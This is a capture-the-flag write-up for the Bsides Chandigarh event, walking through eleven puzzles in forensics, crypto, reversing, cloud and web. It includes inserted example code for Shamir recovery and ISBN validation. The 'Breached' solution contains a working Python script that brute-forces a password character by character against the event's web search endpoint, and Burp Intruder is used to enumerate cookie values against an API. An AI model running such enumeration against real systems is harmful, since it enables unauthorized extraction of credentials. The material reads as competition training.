Bsides Chandigarh CTF
Challenge 1: Sanity Check
A base64-encoded string was given; decoding it with base64 -d or an online decoder gave the flag.
Challenge 2: Fix My Pdf
We first use wget to download the corrupted PDF and then use Ghostscript to try to repair it:
```bash
gs -o repaired.pdf -sDEVICE=pdfwrite -dPDFSETTINGS=/prepress corrupted.pdf
```
But it turned out that on Kali the file was still readable, so the repair was a rabbit hole and I dug deeper.
I now used binwalk to check for hidden files.
We can see there is a decrypt.txt; let's try to extract it.
It shows an invalid header, so we can patch the bytes to match a valid header using hexedit.
After changing these bytes we were able to extract the file using pdftk.
The decrypt.txt was a simple Python script that gave us the flag when run.
Challenge 3: Crypto
```python
from math import prod

def lagrange_interpol(x, xs, ys):
    # Evaluate the Lagrange polynomial through the points (xs, ys) at x
    total = 0
    for i in range(len(xs)):
        numer = prod([(x - xs[j]) / (xs[i] - xs[j]) for j in range(len(xs)) if i != j])
        total += ys[i] * numer
    return total

def recover_secret(shares):
    # The secret is the polynomial's value at x = 0; round() removes float error
    x_coords, y_coords = zip(*shares)
    secret_int = round(lagrange_interpol(0, x_coords, y_coords))
    return secret_int

# Shares
shares = [(1, 567683), (2, 570399), (3, 115050)]

# Recover secret
secret = recover_secret(shares)
print(f"CRAC{{{secret}}}")
```
This is basically Shamir's secret sharing; we had to get the integer output into the CRAC{...} flag format. I implemented Lagrange interpolation by hand instead of using a library because I was facing some errors.
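As an added example (not the write-up's own code), the same recovery done exactly with rationals instead of float division, plus a Shamir split and recovery over a prime field where "division" is a modular inverse; the prime and the demo secret are assumed for the illustration, only the three shares come from the challenge.

```python
from fractions import Fraction
import secrets

# Assumed demo prime (2**61 - 1); the page does not say whether the challenge used a field.
PRIME = (1 << 61) - 1


def recover_exact(shares):
    """Lagrange interpolation at x = 0 over the rationals: exact, so no round() needed."""
    total = Fraction(0)
    for i, (xi, yi) in enumerate(shares):
        basis = Fraction(1)
        for j, (xj, _) in enumerate(shares):
            if i != j:
                basis *= Fraction(-xj, xi - xj)  # (0 - xj) / (xi - xj)
        total += yi * basis
    if total.denominator != 1:
        raise ValueError("shares are not from an integer polynomial")
    return int(total)


def split_secret(secret, k, n, prime=PRIME):
    """Shamir split: random degree k-1 polynomial with f(0) = secret, evaluated at x = 1..n."""
    coeffs = [secret % prime] + [secrets.randbelow(prime) for _ in range(k - 1)]

    def f(x):
        return sum(c * pow(x, e, prime) for e, c in enumerate(coeffs)) % prime

    return [(x, f(x)) for x in range(1, n + 1)]


def recover_mod(shares, prime=PRIME):
    """Lagrange interpolation at x = 0 in GF(prime); any k distinct shares suffice."""
    total = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = num * (-xj) % prime
                den = den * (xi - xj) % prime
        total = (total + yi * num * pow(den, -1, prime)) % prime
    return total


if __name__ == "__main__":
    print(recover_exact([(1, 567683), (2, 570399), (3, 115050)]))
    demo = split_secret(123456789, 3, 5)  # constructed 3-of-5 demo, not challenge data
    print(recover_mod(demo[:3]), recover_mod(demo[2:]))
```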
Challenge 4: Fruit Slice
I opened the file in Ghidra and during analysis came across these hardcoded hex values, which I took to CyberChef.
Then just convert from hex to characters and reverse the result.
Challenge 5: My Bank
Used dcode.fr and validated the ISBNs.
First, used a little bash-fu (cut and sed) to remove the - and : characters.
Then validated the lists at https://www.dcode.fr/isbn-book-code
Then wrote a Python script to get the flag:
```python
# dcode.fr marks each invalid ISBN in results.txt with this symbol
char = '✘'

correct = []
with open('results.txt', 'r') as f:
    for i in range(0, 482):
        data = f.readline()
        if char in data:
            continue
        else:
            correct.append(data.split('\t')[0])

indexes = []
with open('list_isbn.txt', 'r') as base:
    for i in range(0, 482):
        data = base.readline()
        # print(data)
        # Keep the line number of every valid ISBN whose index contains the digit 1
        if (data.strip() in correct) and ('1' in str(i)):
            indexes.append(str(i))

flag = 'CRAC{' + ''.join(indexes) + '}'
print(flag)
```
list_isbn.txt is the list of cleaned ISBNs, without the original indices and the original - separators.
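As an added example (not the write-up's code), the validation dcode.fr did can be done offline: ISBN-10 is digit-weighted mod 11 (X counts as 10), ISBN-13 is 1,3-alternating weights mod 10, and the index rule from the script above is applied on top; the sample list is constructed and assumes the index prefix has already been cut off.

```python
import re


def clean_isbn(raw):
    """Drop '-' separators and whitespace, as the write-up did with cut/sed."""
    return re.sub(r"[-\s]", "", raw).upper()


def isbn10_valid(isbn):
    """ISBN-10: sum of digit * weight (10 down to 1) must be 0 mod 11; 'X' is 10."""
    if not re.fullmatch(r"\d{9}[\dX]", isbn):
        return False
    total = sum((10 - i) * (10 if c == "X" else int(c)) for i, c in enumerate(isbn))
    return total % 11 == 0


def isbn13_valid(isbn):
    """ISBN-13: digits weighted 1,3,1,3,... must sum to 0 mod 10."""
    if not re.fullmatch(r"\d{13}", isbn):
        return False
    total = sum((3 if i % 2 else 1) * int(c) for i, c in enumerate(isbn))
    return total % 10 == 0


def isbn_valid(isbn):
    return isbn10_valid(isbn) or isbn13_valid(isbn)


def valid_indexes_with_one(lines):
    """0-based line numbers of valid ISBNs whose index contains the digit 1 (the write-up's rule)."""
    return [str(i) for i, raw in enumerate(lines)
            if isbn_valid(clean_isbn(raw)) and "1" in str(i)]


# Constructed sample list (not the challenge data); indexes 1 and 11 are valid, 10 is not.
SAMPLE_LINES = [
    "0-306-40615-2", "978-0-306-40615-7", "0-306-40615-3", "0-8044-2957-X",
    "978-0-306-40615-7", "0-306-40615-1", "0-306-40615-2", "978-0-306-40615-0",
    "0-8044-2957-1", "0-306-40615-2", "978-0-306-40615-8", "0-8044-2957-X",
]


def demo_flag(lines=SAMPLE_LINES):
    return "CRAC{" + "".join(valid_indexes_with_one(lines)) + "}"


if __name__ == "__main__":
    print(demo_flag())
```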
Challenge 6: Breached
This was a very fun challenge. I first just randomly pressed enter and also iterated through a-z using the username parameter, and came across the following:
Now we know that the flag format is crac{, so I used the password filter to check for the same. And boom, once again we get:
This time we only got this one user, which means the flag is there and we must brute-force it, so I made a Python script to do so. For some reason ‘{’ was not appending properly in my script, so I ran it until the password did not increment any more and then manually added the final ‘}}’.
```python
import requests
import string

# Base URL
url = 'http://web.ctf.defhawk.com:5000/search-db'

# Headers
headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
    'Accept': '*/*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Referer': 'http://web.ctf.defhawk.com:5000/hogwartstechinc-breached-20231231',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://web.ctf.defhawk.com:5000',
    'Connection': 'close'
}

# Known prefix of the password; each round appends one more character
password = "crac{{ho"

# Iterate over alphanumeric characters until no candidate extends the prefix
while True:
    found = False
    for char in string.ascii_letters + string.digits:
        print("Testing for ", char)
        payload = {'password': password + char}
        print(payload)
        response = requests.post(url, headers=headers, data=payload)
        print(response.text)
        # The user's record only comes back when the prefix filter matches
        if 'hogwarts' in response.text:
            password += char
            print(f"Password: {password}")
            found = True
            break
    if not found:
        # No character matched: the alphanumeric part is complete
        break

print(f"Password: {password}")
```
At this point it started iterating again and again (the original run had no stop condition), which meant we had found all the characters; all that was left was to add the remaining ‘}}’.
```
Password: crac{{hohch0c73747d0e0e0wwissag}}
```
flag: CRAC{hohch0c73747d0e0e0wwissag}
Challenge 7: FlowLogs
This was quite easy: just identify the IP from the logs based on the massive number of accepts and rejects.
CRAC{172.31.32.37}
Challenge 8: Followme
Based on the given text I was able to formulate a URL.
Then I realised I had to create a subscription to get an email or a text, so I used the management console to do so:
https://ap-south-1.console.aws.amazon.com/sns/v3/home?region=ap-south-1#/subscriptions
After this we just verify the email, and the flag is emailed within a few minutes.
Challenge 9: Loop
This challenge dealt with an API Gateway endpoint.
I first tried the URL https://h2vb2gupxd.execute-api.ap-south-1.amazonaws.com/prod/
Since I was getting Forbidden, I re-read the question and noticed something about collectBits; I thought that was the endpoint, so I added it:
https://h2vb2gupxd.execute-api.ap-south-1.amazonaws.com/prod/collectBits/
```json
{"errorMessage": "'cookie'", "errorType": "KeyError", "requestId": "d07a64c9-880d-4022-acc8-df712bbd0d0f", "stackTrace": [" File \"/var/task/lambda_function.py\", line 10, in lambda_handler\n cookie_header = event['headers']['cookie']\n"]}
```
This error message indicated that I needed a cookie with an integer value. I quickly spun up Burp and checked integer 0; it seemed as if I was going to get the flag by sending integers in sequence, so I used Intruder to run the attack.
After reading each individual response:
CRAC{H0w_Many_C@lls_Y0u_Can_M@ke}
Challenge 10: OneCallAway
Using ltrace I could see that the string was being compared to vhvdph, so now I can use that as input.
I got a string of decimal characters; now trying to decode the following:
It indicated a flag, but I would have to rearrange these to get the final flag. Before that I decided to look at the binary in IDA and BOOM:
print_phrase_decimal -> This function had the flag stored in it and I just had to type it in!
Challenge 11: LOUDER
Find the flag and when they ask, say “hocus pocus”.
This hint gave away the whole thing: it meant we had to extract a file using steghide, and the password was hocus pocus.